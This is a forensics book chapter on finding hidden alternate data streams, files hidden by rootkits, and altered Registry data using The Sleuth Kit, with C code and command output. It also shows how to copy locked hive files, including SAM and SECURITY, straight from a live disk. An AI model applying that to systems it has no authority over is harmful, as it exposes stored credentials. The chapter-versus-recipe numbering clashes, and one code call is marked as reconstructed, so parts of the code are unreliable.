Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code (2011)

Chapter 9. Malware Forensics

In this chapter, we combine malware analysis techniques with forensic tools. The objective is to give you a better understanding of how malware alters a system so that you know what to look for when detecting infections, and how to react when you encounter such malware. Likewise, the chapter gives you some tips on how to build your own tools if the current ones don’t suit your needs. It is important to note that this chapter is not a step-by-step guide with a comprehensive list of actions you should take during an investigation. Rather, the chapter presents a collection of explanations and solutions to specific problems that we think you’ll run into while analyzing or investigating malware incidents.

The Sleuth Kit (TSK)

The Sleuth Kit is a C library and a collection of command-line tools for file system forensic investigations. On an Ubuntu system, you can type apt-get install sleuthkit to get the Linux binaries. If the repository doesn’t have the latest version, or if you want the precompiled Windows binaries, you can get them from TSK’s SourceForge page. In this section, we’ll use TSK to investigate alternate data streams, hidden files, and hidden Registry keys.

Recipe 10-1: Discovering Alternate Data Streams with TSK

Malware that hides in alternate data streams (ADS) has been around for many years and it is still prevalent today. Explorer and command-line directory listings (via cmd.exe) don’t show data in ADS, so this allows malware to hide files from anyone who doesn’t have special tools to view them. In this recipe, we’ll discuss how those tools work and how you can leverage TSK to detect ADS on both live systems and mounted drives.

Creating ADS

You can create an ADS on your system by specifying a colon (:) between the name of the desired host file and the name of the stream. For example, if you wanted to attach a stream (named “stream”) to C:\host.txt, you could do the following:

C:\> echo "this is a message" > host.txt:stream

When you use dir to view a directory listing, host.txt will exist, but the stream will not. The size of the host.txt file will also not increase. You can still read or modify the stream, but you need to know its name:

C:\> notepad.exe host.txt:stream

Detecting ADS on Live Systems

To detect ADS on live systems, you can use one of the following command-line tools:

·           lads.exe [1] by Frank Heyne

·           lns.exe [2] by Arne Vidstrom

·           sfind.exe [3] by Foundstone

·           streams.exe [4] by Mark Russinovich

A caveat to lns.exe and sfind.exe is that they do not detect streams attached to folders or drives. Other than that, the tools operate in a similar manner. They walk the file system from a specified top-level directory using the FindFirstFile and FindNextFile API functions. For each item, the tools call BackupRead to query for any associated named streams. Internally, BackupRead calls NtQueryInformationFile with a FILE_INFORMATION_CLASS of FileStreamInformation. You can find source code showing how to enumerate ADS, both with BackupRead and by calling the native NtQueryInformationFile API directly, on the Microsoft MVPs website [5].

Analyzing the Master File Table (MFT) for ADS Info

A weakness with the aforementioned tools is that they will fail to enumerate streams if the host file or directory is hidden. For example, if host.txt and host.txt:stream exist, and a rootkit prevents FindNextFile from listing host.txt, then the tools have no chance of identifying host.txt:stream. Furthermore, some ADS detection tools suppress streams associated with normal system activity, such as the streams named Zone.Identifier that Internet Explorer attaches to downloaded files. Ignoring these streams can be a good way to cut down on noise, but it can also result in overlooking evidence. The FFSearcher trojan [6] created a stream named Zone.Identifier that was actually a malicious DLL and thus remained hidden from some ADS detection tools.
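One way to avoid the Zone.Identifier blind spot is to judge such streams by content rather than by name. The following is a minimal sketch, assuming you have already extracted the stream's bytes into a string. The function names are hypothetical and not part of any tool named here. It relies on two facts: a genuine Zone.Identifier stream is a small INI-style text that starts with [ZoneTransfer], and a PE file (such as a DLL) starts with the bytes MZ. It also assumes the stream text is stored as plain ANSI.

```cpp
#include <cassert>
#include <string>

// Hypothetical helpers for illustration; not part of TSK or the tools above.

// True when the content begins with the PE/DOS "MZ" magic, which a genuine
// Zone.Identifier stream should never do.
bool starts_with_mz(const std::string &data)
{
    return data.size() >= 2 && data[0] == 'M' && data[1] == 'Z';
}

// True when the content begins with the "[ZoneTransfer]" section header
// that Internet Explorer writes (assumes ANSI text with no byte-order mark).
bool looks_like_zone_identifier(const std::string &data)
{
    static const std::string header = "[ZoneTransfer]";
    return data.compare(0, header.size(), header) == 0;
}

// A stream named Zone.Identifier is suspicious if it looks like an
// executable or lacks the expected header. Other stream names are out of
// scope for this check and are never flagged by it.
bool suspicious_zone_stream(const std::string &stream_name,
                            const std::string &data)
{
    if (stream_name != "Zone.Identifier")
        return false;
    return starts_with_mz(data) || !looks_like_zone_identifier(data);
}
```

A check like this lets a tool keep suppressing the benign streams while still reporting one that merely borrows the name.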

For the few reasons we just described, you may be interested in designing your own ADS detection tool for live systems or learning how to identify streams on mounted drives. You can do all of this with TSK. TSK walks the file system by parsing the MFT directly. Therefore, rootkits that hook FindNextFile will not be an issue. The MFT stores information about all files and folders on disk and is also the authoritative source of evidence regarding ADS. In fact, BackupRead and NtQueryInformationFile are just indirect ways to read the data structures stored in the MFT.

To begin using TSK on a live Windows system, make sure you have administrative privileges (required to open the physical drive) and then use mmls to determine the starting sector for the NTFS partition. In the output of the following command, 63 is the starting sector.

F:\>mmls \\.\PhysicalDrive0

DOS Partition Table

Offset Sector: 0

Units are in 512-byte sectors

      Slot    Start        End          Length       Description

00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)

01:  -----   0000000000   0000000062   0000000063   Unallocated

02:  00:00   0000000063   0067087439   0067087377   NTFS (0x07)

03:  -----   0067087440   0067103504   0000016065   Unallocated

Note: With TSK, the commands to find ADS on a live system are almost the same as the ones you use to find ADS on a suspect drive attached read-only to your forensic workstation. Instead of passing \\.\PhysicalDrive0 to the tools, you pass /dev/sdb (or whichever device node corresponds to the suspect drive).
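The command-line tools take the partition offset in sectors, whereas the TSK API works with byte offsets (the starting sector multiplied by the sector size). As a rough sketch of that arithmetic, the following function parses one partition row of mmls output and returns the byte offset. The function name and the column assumptions (index, slot, start sector) are ours and are based only on the output shown above.

```cpp
#include <cassert>
#include <cstdint>
#include <sstream>
#include <string>

// Hypothetical helper: parse one row of mmls output such as
//   "02:  00:00   0000000063   0067087439   0067087377   NTFS (0x07)"
// and compute the partition's byte offset. Returns false for rows that do
// not start with an index, a slot, and a numeric start sector (for
// example, the column header).
bool mmls_row_offset(const std::string &row, std::uint64_t sector_size,
                     std::uint64_t &byte_offset)
{
    std::istringstream in(row);
    std::string index, slot;
    std::uint64_t start = 0;

    // Streams parse in decimal by default, so the leading zeros that mmls
    // prints are not mistaken for an octal prefix.
    if (!(in >> index >> slot >> start))
        return false;

    byte_offset = start * sector_size;
    return true;
}
```

For the NTFS row above and 512-byte sectors, the result is 63 * 512 = 32256 bytes.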

Once you know the offset of the NTFS partition, you can run fls to enumerate files and then filter the output for any files with a colon (:) in their name. For example, the following command searches recursively (-r) and prints full paths (-p). We narrowed the output down to show only the few ADS that we created for the example case.

F:\> fls -o63 -r -p \\.\PhysicalDrive0

r/r 10815-128-1:    str/host.txt

r/r 10815-128-4:    str/host.txt:binary.exe

r/r 10815-128-3:    str/host.txt:stream

The first number (10815) that you see in each line of the output is the host file’s inode. The inode uniquely identifies each file and directory on the file system. The next number (128) is the MFT attribute type. 128 corresponds to a $DATA attribute. Every file has at least one $DATA attribute, which contains the file’s content. If any files have more than one $DATA attribute, then those extra $DATA attributes are alternate data streams. Each attribute also has a sequence ID so that you can tell the different data streams apart. For example:

·           10815-128-1: Refers to the default $DATA attribute for host.txt. Its sequence ID is 1.

·           10815-128-3: Refers to an alternate stream named “stream.” Its sequence ID is 3.

·           10815-128-4: Refers to the alternate stream named binary.exe. Its sequence ID is 4.
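The filtering step can be automated. The sketch below parses a single line of fls output in the format shown above and flags it as an alternate stream when the attribute type is 128 and the file name contains a colon. The struct and function names are hypothetical, and the parser only handles lines for allocated entries like the ones in this example (it does not handle the extra markers fls prints for deleted entries).

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// One parsed line of fls output (field names are our own).
struct FlsEntry {
    unsigned long inode;  // MFT entry number of the host file
    unsigned type;        // MFT attribute type (128 = $DATA)
    unsigned id;          // attribute sequence ID
    std::string path;     // path as printed by fls -p
    bool is_ads;          // true if the line names an alternate stream
};

// Parses lines such as "r/r 10815-128-3:    str/host.txt:stream".
// Returns false if the line does not match that layout.
bool parse_fls_line(const std::string &line, FlsEntry &out)
{
    char kind[16];
    int consumed = 0;

    // %n records how many characters were consumed. It stays 0 if the
    // trailing ':' after the sequence ID is missing.
    if (std::sscanf(line.c_str(), "%15s %lu-%u-%u:%n",
                    kind, &out.inode, &out.type, &out.id, &consumed) != 4
        || consumed == 0)
        return false;

    // The remainder of the line, minus leading whitespace, is the path.
    std::string::size_type start = line.find_first_not_of(" \t", consumed);
    out.path = (start == std::string::npos) ? "" : line.substr(start);

    // Only look for the colon in the last path component.
    std::string::size_type slash = out.path.find_last_of('/');
    std::string name = (slash == std::string::npos)
                           ? out.path
                           : out.path.substr(slash + 1);

    out.is_ads = (out.type == 128) && (name.find(':') != std::string::npos);
    return true;
}
```

Feeding each line of the fls output through parse_fls_line and keeping the entries where is_ads is true yields the inode-type-ID triplets that you can pass to icat.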

You can get extended information about the file whose inode is 10815 by using the istat command, like this:

F:\> istat -o63 \\.\PhysicalDrive0 10815



Type: $STANDARD_INFORMATION (16-0)   Name: N/A   Resident   size: 72

Type: $FILE_NAME (48-2)   Name: N/A   Resident   size: 82

Type: $DATA (128-1)   Name: $Data   Resident   size: 11

Type: $DATA (128-4)   Name: binary.exe   Non-Resident   size: 218112

Type: $DATA (128-3)   Name: stream   Resident   size: 4

Now you can see the size of each stream. To extract a stream’s content from disk, you can use the icat command. icat reads the MFT to find out which sectors of the disk contain the file’s contents and then rebuilds the file based on that information. The result is that you get a copy of the file without having to use CreateFile, CopyFile, or other APIs that rootkits commonly hook to hide or prevent access to files. The following commands show how to extract the content of the host.txt file and its two alternate streams.

F:\> icat -o63 \\.\PhysicalDrive0 10815-128-1 > F:\host.txt

F:\> icat -o63 \\.\PhysicalDrive0 10815-128-3 > F:\host.txt_stream

F:\> icat -o63 \\.\PhysicalDrive0 10815-128-4 > F:\host.txt_binary.exe

In summary, using TSK for ADS discovery and extraction requires several steps. However, you can develop an application with TSK’s API that handles all of the steps automatically (see Recipe 10-2). TSK is not immune to rootkits on live systems, but by querying the MFT directly, it can evade many common rootkits that other tools cannot.







Recipe 10-2: Detecting Hidden Files and Directories with TSK


You can find supporting materials for this recipe on the companion DVD.

A useful approach to detecting rootkit activity on live systems is called cross-view. Cross-view–based rootkit detection tools generate information about a system in two or more ways and then look for discrepancies in the results. In order to detect hidden files, this might include reading the MFT for a low-level view and walking the file system with Windows APIs, such as FindFirstFile and FindNextFile, for a high-level view. If files exist in the MFT that cannot be found with the Windows API, then a rootkit may be hiding them. This recipe shows you how to use a cross-view–based hidden file detector that we built using TSK.
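At its core, the cross-view comparison is a set difference: everything in the low-level view that is missing from the high-level view. The following sketch illustrates the idea with the C++ standard library. It is not the implementation used by the tool in this recipe, the function name is hypothetical, and it assumes both listings use identically normalized paths.

```cpp
#include <algorithm>
#include <cassert>
#include <iterator>
#include <set>
#include <string>
#include <vector>

// Returns the paths present in the low-level view (for example, the MFT)
// but absent from the high-level view (for example, the Windows API).
// Both sets must use the same path format for the comparison to be valid.
std::vector<std::string> hidden_from_api(
    const std::set<std::string> &low_level,
    const std::set<std::string> &high_level)
{
    std::vector<std::string> hidden;
    std::set_difference(low_level.begin(), low_level.end(),
                        high_level.begin(), high_level.end(),
                        std::back_inserter(hidden));
    return hidden;
}
```

Using sorted sets keeps the comparison at roughly O(n log n), which matters on volumes with hundreds of thousands of files. Note that files created or deleted between the two scans show up as discrepancies too, so a hit is a lead to investigate rather than proof of a rootkit.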

The Sleuth Kit API

One of the best things about TSK is that it’s not just a collection of precompiled tools. TSK exposes a C API that you can leverage to write your own applications. The source code ships with a few sample applications that you can compile with Microsoft’s Visual Studio or on Linux with mingw32. The next few pages show you the necessary steps to get started. If you need more information, you can browse the TSK online user’s guide and API reference [7].

1. Open the disk image and its encapsulated volume system:

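TSK_IMG_INFO *img = tsk_img_open_sing(

    _TSK_T("\\\\.\\PhysicalDrive0"), // device path assumed from Recipe 10-1

    TSK_IMG_TYPE_DETECT,             // let TSK detect the image type

    0);                              // 0 = use the default sector size

TSK_VS_INFO *vs = tsk_vs_open(img, 0, TSK_VS_TYPE_DETECT);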

2. Walk the volume’s partition table by passing a callback function to tsk_vs_part_walk. In the example that follows, the callback function named part_act will be called once for each partition.

tsk_vs_part_walk(vs, 0, vs->part_count - 1, 

     TSK_VS_PART_FLAG_ALLOC, part_act, NULL); 

Your callback function receives a TSK_VS_PART_INFO structure, which contains information about the partition type (e.g., FAT or NTFS) and its starting sector and size.

3. In the code that follows, ignore partitions that do not contain an NTFS file system. Otherwise, open the file system with tsk_fs_open_img. The following code automates the procedure of using mmls to find the starting sector of the NTFS file system (i.e., the –o63 parameter that we passed to TSK tools in Recipe 10-1).


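static TSK_WALK_RET_ENUM

part_act(TSK_VS_INFO * vs,

         const TSK_VS_PART_INFO * part,

         void *ptr)

{

    TSK_FS_INFO *fs;

    // is this an NTFS partition?

    if (memcmp(part->desc, "NTFS", 4) == 0)

    {

        // open the NTFS file system (the offset is in bytes)

        if ((fs = tsk_fs_open_img(vs->img_info,

            part->start * vs->block_size,

            TSK_FS_TYPE_DETECT)) == NULL)

        {

            return TSK_WALK_CONT;

        }

        // set the flags for how to walk the file system:

        // allocated entries only, no orphan files, recursive

        int flags = TSK_FS_NAME_FLAG_ALLOC |\

                    TSK_FS_DIR_WALK_FLAG_NOORPHAN |\

                    TSK_FS_DIR_WALK_FLAG_RECURSE;

        // register a callback function for enumerating files

        tsk_fs_dir_walk(fs, fs->root_inum,

            (TSK_FS_DIR_WALK_FLAG_ENUM) flags,

            xview_callback, NULL);

        // release the file system object when the walk is done

        tsk_fs_close(fs);

    }

    return TSK_WALK_CONT;

}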


4. After opening the NTFS file system, you can use the tsk_fs_dir_walk function to begin enumerating its contents. The following is a description of the parameters to this function:

·       The first parameter, fs, is a pointer to the open file system object.

·       The second parameter, fs->root_inum, is the inode number of the top-level directory from which to begin walking the file system. If there’s a directory other than the root (i.e., C:\) that you’d like to start with, then you need to find your desired directory’s inode number and use that in place of fs->root_inum.

·       The third parameter, flags, is a value that controls how TSK enumerates files and determines which files/directories to include in the results. The combination of flags we used tells TSK to ignore deleted files, ignore the special orphan files, and perform the walk recursively.

·       The fourth parameter, xview_callback, is a user-defined function that the TSK library calls once for each file or directory that meets the criteria specified by your flags value.

Enumerating Files with the Windows API

Before the xview_callback function executes, you need to generate a list of files that exist on the file system using the Windows API. This is the “high-level” view that we will use for comparison with the list of files in the MFT. In the code that follows, we use a C++ vector (dynamically sizeable array) to collect the full paths to all files and directories. The win32_visible function returns TRUE if a given file or directory is visible using the Windows API. If it cannot find the given file or directory, the function returns FALSE.


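// full paths of everything the Windows API can see

std::vector<LPSTR> vfiles;

// returns TRUE if the path was seen by the Windows API walk

bool win32_visible(char *file)

{

    std::vector<LPSTR>::iterator it;

    LPSTR p;

    for(it=vfiles.begin(); it!=vfiles.end(); it++) {

        p = *(it);

        if (strcmp(p, file) == 0) {

            return TRUE;

        }

    }

    return FALSE;

}

// stores a copy of the path, using forward slashes to match TSK

void addfile(LPSTR path)

{

    LPSTR p = new char[MAX_PATH];

    if (p) {

        strcpy_s(p, MAX_PATH, path);

        for(size_t i=0; i<strlen(p); i++) {

            if (p[i] == '\\') p[i] = '/';

        }

        vfiles.push_back(p);

    }

}

// recursively records every file and directory under dir

void enumfiles(LPSTR dir)

{

    HANDLE   hFind;

    char     path[MAX_PATH];

    WIN32_FIND_DATAA fd;

    sprintf_s(path, MAX_PATH, "%s\\*", dir);

    hFind = FindFirstFileA(path, &fd);

    if (hFind == INVALID_HANDLE_VALUE)

        return;

    do {

        if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {

            // skip the dot directories

            if (strcmp(fd.cFileName, ".") == 0 ||

                strcmp(fd.cFileName, "..") == 0) {

                continue;

            }

            sprintf_s(path, MAX_PATH, "%s\\%s", dir, fd.cFileName);

            addfile(path);

            enumfiles(path);

        }

        else {

            sprintf_s(path, MAX_PATH, "%s\\%s", dir, fd.cFileName);

            addfile(path);

        }

    } while(FindNextFileA(hFind, &fd));

    FindClose(hFind);

}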




Comparing TSK Data with Windows API Data

This section shows the xview_callback function, which is called once for each file or directory on the system. It receives three arguments: fs_file, which is a pointer to a data structure with information about the file and its metadata, a_path, which identifies the directory in which the file resides, and ptr, which is an optional parameter that you can pass when calling tsk_fs_dir_walk.

The beginning of the function performs a few sanity checks to ensure that the object is a file or a directory, the object’s metadata is available, and the object is not one of the special NTFS metadata files such as $MFT, $Secure, and so on. Then the function cycles through each of the file’s attributes to determine if there is more than one $DATA attribute (thus indicating an alternate stream is present) and also locates the $FILE_NAME attribute, whose timestamps help detect timestamp-altering malware (explained later in this recipe). More important for this recipe is that it passes the full path of each file or directory to win32_visible. Based on the function’s return value, our program can determine which files are hidden from the Windows API.


static TSK_WALK_RET_ENUM

xview_callback(TSK_FS_FILE * fs_file,

                const char *a_path,

                void *ptr)

{

    int i, cnt;

    char p[MAX_PATH*2];

    std::vector<uint16_t> ids;

    std::vector<uint16_t>::iterator it;

    // skip the NTFS system files

    if (!TSK_FS_TYPE_ISNTFS(fs_file->fs_info->ftype) ||

       (fs_file->name == NULL) ||

       (fs_file->name->name[0] == '$')) {

           return TSK_WALK_CONT;

    }

    // skip deleted entries

    if (fs_file->meta == NULL) {

        return TSK_WALK_CONT;

    }

    // skip anything that's not a file or directory

    // or if it's a dot directory (. and ..)

    if (((fs_file->meta->type != TSK_FS_META_TYPE_REG) && \

        (fs_file->meta->type != TSK_FS_META_TYPE_DIR)) ||

        ((fs_file->meta->type == TSK_FS_META_TYPE_DIR) && \

        (TSK_FS_ISDOT(fs_file->name->name)))) {

            return TSK_WALK_CONT;

    }

    const TSK_FS_ATTR *fs_name_attr = NULL;

    // cycle through the attributes

    cnt = tsk_fs_file_attr_getsize(fs_file);

    for (i = 0; i < cnt; i++)

    {

        const TSK_FS_ATTR *fs_attr =

            tsk_fs_file_attr_get_idx(fs_file, i);

        if (!fs_attr)

            continue;

        // save the $FNA and collect $DATA uniq seq ids

        if (fs_attr->type == TSK_FS_ATTR_TYPE_NTFS_FNAME) {

            fs_name_attr = fs_attr;

        } else if (fs_attr->type == TSK_FS_ATTR_TYPE_NTFS_DATA) {

            ids.push_back(fs_attr->id);

        }

    }

    // check if files/dirs are visible via win32 api

    memset(p, 0, sizeof(p));

    sprintf(p, "C:/%s/%s", a_path, fs_file->name->name);

    if (!win32_visible(p)) {

        alert(A_HIDDEN, a_path, fs_file, NULL, fs_name_attr);

    }

    // files with less than two $DATA attribs don't have ADS.

    // if a file has 2 or more $DATA attribs then ignore the

    // one with lowest seq id (the default entry). dirs with

    // less than one $DATA attrib don't have ADS

    if (fs_file->meta->type == TSK_FS_META_TYPE_REG) {

        if (ids.size() < 2)

            return TSK_WALK_CONT;

        std::sort(ids.begin(), ids.end());

        // drop the lowest seq id (the default $DATA entry)

        ids.erase(ids.begin());

    } else {

        if (ids.size() < 1)

            return TSK_WALK_CONT;

    }

    // cycle through the attributes again...but this

    // time, print the attribs with seq ids in our list

    for (i = 0; i < cnt; i++)

    {

        const TSK_FS_ATTR *fs_attr =

            tsk_fs_file_attr_get_idx(fs_file, i);

        if (!fs_attr)

            continue;

        bool print = false;

        for(it=ids.begin(); it!=ids.end(); it++) {

            if (fs_attr->id == *(it)) {

                print = true;

                break;

            }

        }

        if (print) {

            alert(A_STREAM, a_path, fs_file, fs_attr, fs_name_attr);

        }

    }

    return TSK_WALK_CONT;

}


Using tsk-xview.exe

Figure 10-1 shows how the output of tsk-xview.exe appears on a system with hidden objects. In this case, the machine is infected with Zeus, which hides its configuration files by hooking NtQueryDirectoryFile.

Figure 10-1: Using tsk-xview.exe to detect hidden files


In the output, you’ll see the full path to the hidden object, its inode, its type (directory or file), its size, and the set of eight timestamps: four from the $STANDARD_INFORMATION Attribute (SIA) and four from the $FILE_NAME Attribute (FNA). Why do we show all eight timestamps? It is so you can detect timestamp-altering malware per the method described by Lance Mueller on his blog [8]. When malware uses SetFileTime to change the last access, last write, or creation time of a file, the change applies only to the timestamps in the SIA. Thus, if the timestamps in the SIA predate the timestamps in the FNA, it could indicate the malware is attempting to blend in with older files on disk.

The following output is from the same Zeus-infected machine. Zeus not only hides sdra64.exe with the NtQueryDirectoryFile hook, but it also sets two of the file’s timestamps equal to those of ntdll.dll. This makes sdra64.exe appear as if it was installed at the same time as ntdll.dll, which may trick some system administrators into thinking that sdra64.exe is a component of the Windows OS. As you can see in the following output, the creation and last-modified timestamps in the SIA are in 2008 and 2009, respectively. However, the creation and last-modified timestamps in the FNA are in 2010.

 [HIDDEN] C:/WINDOWS/system32/sdra64.exe

  Inode: 116039

  Type: File

  Size: 124416

   SIA Created:         Mon Apr 14 08:00:00 2008

  SIA File Modified:   Mon Feb 09 07:10:48 2009

  SIA MFT Modified:    Fri Jun 25 15:18:16 2010

  SIA Accessed:        Fri Jun 25 15:00:52 2010

   FNA Created:         Fri Jun 25 15:18:16 2010

  FNA File Modified:   Fri Jun 25 15:18:16 2010

  FNA MFT Modified:    Fri Jun 25 15:18:16 2010

  FNA Accessed:        Fri Jun 25 15:18:16 2010
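The comparison described above is simple to automate once the eight timestamps are available. The sketch below assumes they have already been converted to time_t values. The struct and function names are hypothetical. It checks only the creation and last-modified fields, because those are the two that differ by years in the sdra64.exe example.

```cpp
#include <cassert>
#include <ctime>

// The four timestamps stored in either the SIA or the FNA
// (field names are our own).
struct NtfsTimes {
    std::time_t created;
    std::time_t modified;
    std::time_t mft_modified;
    std::time_t accessed;
};

// Returns true when the SIA creation or last-modified time is earlier than
// its FNA counterpart, the pattern left behind when SetFileTime is used to
// backdate a file.
bool sia_predates_fna(const NtfsTimes &sia, const NtfsTimes &fna)
{
    return sia.created < fna.created || sia.modified < fna.modified;
}
```

Treat a positive result as a hint rather than proof. Legitimate software can also produce an SIA last-modified time that is older than the FNA values, for example when an installer or archive tool preserves a file's original modification time, so the creation time is usually the more telling of the two fields.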

The Disadvantages of tsk-xview.exe

The technique described in this recipe will detect most methods used to hide files, but certainly not all of them. Here are a few attacks that tsk-xview.exe will not be effective against.

·           If malware allows you to enumerate a file with the Windows API, but hooks CreateFile so that you can’t open it, then tsk-xview.exe won’t report anything suspicious.

·           If malware allows you to enumerate and open a file, but hooks ReadFile such that it returns false data upon trying to read the file’s content, tsk-xview.exe won’t report anything suspicious.

·           If malware prevents access to \\.\PhysicalDrive0, such that the tool cannot read the MFT, then tsk-xview.exe will simply not work.

For more information on potential attacks against cross-view–based rootkit detection, see Joanna Rutkowska’s paper “Thoughts about Cross-View based Rootkit Detection” [9].

Note: Sysinternals’ RootkitRevealer [10] is an example of a cross-view–based utility that can discover hidden files and Registry keys. There’s no command-line version of the tool, but you can still use it in a non-interactive manner by passing it the –a (automatically scan and then exit when done) flag and specifying a location for the output file to be written. That way, you can call RootkitRevealer from a script or execute it on a remote system using PsExec. When RootkitRevealer begins, it starts a service on the target system and loads a kernel driver that assists with gathering the data required for the low-level view.





Recipe 10-3: Finding Hidden Registry Data with Microsoft’s Offline API


You can find supporting materials for this recipe on the companion DVD.

By combining TSK’s functionality with Microsoft’s Offline Registry API [11], you can develop tools for detecting hidden data in the Registry. This recipe describes an extension to the cross-view tool discussed in Recipe 10-2. The extension works by comparing the data that exists in the Registry hive files (on disk) with the data that exists in the Registry according to the Windows API. Any discrepancies between the two may indicate attempts to hide data.

Accessing the Registry Hives

For the low-level view of the Registry, you must obtain a copy of the Registry hive files on disk. You can do this by using TSK to make a copy of the files. Note that the System process (PID 4 on Windows XP and 7) locks the hive files so that no other processes can access them while the machine is powered on. However, with TSK you can open the physical drive and carve out the hive file’s contents sector by sector, which bypasses the System process’s locks. Once you’ve made a copy of the hive files, you can parse them with the offline Registry API.

Extracting Registry Hives with TSK

In Recipe 10-1, you learned how to use icat to extract data hidden in ADS. You can perform the same actions as icat using the TSK API in order to extract the Registry hives from a live system. The only prerequisite is that you know the inode of the hive files, which you can find by using the tsk_fs_ifind_path function. The code that follows shows how to get the inode of the software hive, given its path on disk. The fs parameter that you see is a pointer to an open file system object, which you learned how to get in Recipe 10-2.

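TSK_INUM_T inum_software;

// NOTE: this call is missing from the listing and has been reconstructed.

// The argument order and the hive path (Windows XP layout) are assumptions.

tsk_fs_ifind_path(fs,

    (TSK_TCHAR *) L"/WINDOWS/system32/config/software",

    &inum_software);

icat_dump(fs, inum_software, L"software.bin");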

The icat_dump function (which is defined in our program and is not part of the TSK API) takes the inode of a file to dump and an output file name. It uses tsk_fs_file_open_meta to access the inode’s metadata. The metadata contains the list of sectors on disk where the file’s contents reside. It passes this information and a callback function named icat_action to tsk_fs_file_walk. The icat_action function is called once for each chunk of the file’s contents, which it writes to the specified output file.


static TSK_WALK_RET_ENUM

icat_action(TSK_FS_FILE * fs_file, TSK_OFF_T a_off,

             TSK_DADDR_T addr, char *buf, size_t size,

             TSK_FS_BLOCK_FLAG_ENUM flags, void *ptr)

{

    if (size == 0)

        return TSK_WALK_CONT;

    // append this chunk to the output file

    if (fwrite(buf, size, 1, (FILE*) ptr) != 1) {

        return TSK_WALK_ERROR;

    }

    return TSK_WALK_CONT;

}

int icat_dump(TSK_FS_INFO *fs, TSK_INUM_T inum, LPCWSTR outfile)

{

    TSK_FS_FILE *fs_file;

    FILE * outf = _wfopen(outfile, L"wb");

    if (outf == NULL) {

        printf("[ERROR] Cannot open %ws\n", outfile);

        return -1;

    }

    fs_file = tsk_fs_file_open_meta(fs, NULL, inum);

    if (!fs_file) {

        fclose(outf);

        return 1;

    }

    // walk the file's content and write each chunk to outf

    tsk_fs_file_walk(fs_file,

      (TSK_FS_FILE_WALK_FLAG_ENUM) 0, icat_action, outf);

    tsk_fs_file_close(fs_file);

    fclose(outf);

    return 0;

}


The example code extracts the software hive to software.bin. You now have a copy of the hive file as if you’d copied it off a mounted drive. The SAM, SECURITY, System, and NTUSER.DAT hive files can be extracted using the same methodology.
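Before handing an extracted file to a Registry parser, it can be worth confirming that the dump really is a hive. Registry hive files begin with the four-byte signature regf. The following sketch checks for it. The function names are hypothetical, and the check validates only the signature, not the rest of the hive header.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdio>
#include <cstring>

// True when the buffer starts with the "regf" hive signature.
bool is_regf(const unsigned char *buf, std::size_t len)
{
    return len >= 4 && std::memcmp(buf, "regf", 4) == 0;
}

// Reads the first four bytes of the file and checks the signature.
// Returns false if the file cannot be opened or is shorter than 4 bytes.
bool file_is_regf(const char *path)
{
    std::FILE *f = std::fopen(path, "rb");
    if (!f)
        return false;

    unsigned char head[4];
    std::size_t n = std::fread(head, 1, sizeof(head), f);
    std::fclose(f);

    return is_regf(head, n);
}
```

For example, calling file_is_regf("software.bin") after the dump completes gives a quick indication of whether the extraction produced a plausible hive.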

Microsoft’s Offline Registry API

The offline Registry API allows you to read from (and write to) a Registry hive outside of the active system’s Registry. This is exactly what you need to parse the hive files you extracted with TSK. The offline Registry API is provided in the Windows Driver Kit [12] and implemented as a redistributable DLL named offreg.dll. The tsk-xview.exe tool dynamically links with offreg.dll in order to access the required functions.

There is little to no learning curve involved in using the offline Registry API if you’re already familiar with the standard Windows Registry API. The two are almost the same regarding the parameters they take, but they have different names. For example, to query a key for its information using the Windows Registry API, you can use RegQueryInfoKey. The equivalent function in the offline Registry API is ORQueryInfoKey. The following code shows an example of using the offline Registry API to open a hive file and recursively parse its keys and values.

#include <windows.h>

#include <stdio.h>

#include <tchar.h>

#include <offreg.h>

#pragma comment (lib, "offreg.lib")

#define MAX_KEY_NAME 255     //longest key name

#define MAX_VALUE_NAME 16383 //longest value name

#define MAX_DATA 1024000     //longest data amount

int EnumerateKeys(ORHKEY OffKey, LPWSTR szKeyName)

{

    DWORD    nSubkeys;

    DWORD    nValues;

    DWORD    nSize;

    DWORD    dwType;

    DWORD    cbData;

    ORHKEY   OffKeyNext;

    WCHAR    szValue[MAX_VALUE_NAME];

    WCHAR    szSubKey[MAX_KEY_NAME];

    WCHAR    szNextKey[MAX_KEY_NAME];

    DWORD    i;

    // get the number of keys and values

    if (ORQueryInfoKey(OffKey, NULL, NULL, &nSubkeys,

        NULL, NULL, &nValues, NULL,

        NULL, NULL, NULL) != ERROR_SUCCESS)

    {

        return 0;

    }

    printf("%ws\n", szKeyName);

    // loop for each of the values

    for(i=0; i<nValues; i++) {

        memset(szValue, 0, sizeof(szValue));

        nSize  = MAX_VALUE_NAME;

        dwType = 0;

        cbData = 0;

        // get the value's name and required data size

        if (OREnumValue(OffKey, i, szValue, &nSize,

             &dwType, NULL, &cbData) != ERROR_MORE_DATA)

        {

            continue;

        }

        // allocate memory to store the data

        LPBYTE pData = new BYTE[cbData+2];

        if (!pData) {

            continue;

        }

        memset(pData, 0, cbData+2);

        // the first call overwrote nSize with the name length,

        // so reset it to the buffer size

        nSize = MAX_VALUE_NAME;

        // get the name, type, and data

        if (OREnumValue(OffKey, i, szValue, &nSize,

             &dwType, pData, &cbData) != ERROR_SUCCESS)

        {

            delete[] pData;

            continue;

        }

        // Here you would check if the Windows API can access a

        // value named szValue in the active system registry

        // that has a data type of dwType, a size of cbData and

        // data that matches the contents of pData.

        printf("  %-12ws\n", szValue);

        delete[] pData;

    }

    // loop over each subkey and recurse into it

    for(i=0; i<nSubkeys; i++) {

        memset(szSubKey, 0, sizeof(szSubKey));

        nSize = MAX_KEY_NAME;

        // get the name of the subkey

        if (OREnumKey(OffKey, i, szSubKey, &nSize,

             NULL, NULL, NULL) != ERROR_SUCCESS)

        {

            continue;

        }

        swprintf(szNextKey, MAX_KEY_NAME, L"%s\\%s",

             szKeyName, szSubKey);

        // open the subkey

        if (OROpenKey(OffKey, szSubKey, &OffKeyNext)

             == ERROR_SUCCESS)

        {

            // Here you would check if the Windows API can access a

            // subkey named szSubKey in the active system registry

            EnumerateKeys(OffKeyNext, szNextKey);

            ORCloseKey(OffKeyNext);

        }

    }

    return 0;

}

// build as Unicode: OROpenHive expects a wide-character path

int _tmain(int argc, _TCHAR* argv[])

{

    ORHKEY OffHive;

    if (argc != 2) {

        printf("Usage: offreg-example.exe <hive file>\n");

        return -1;

    }

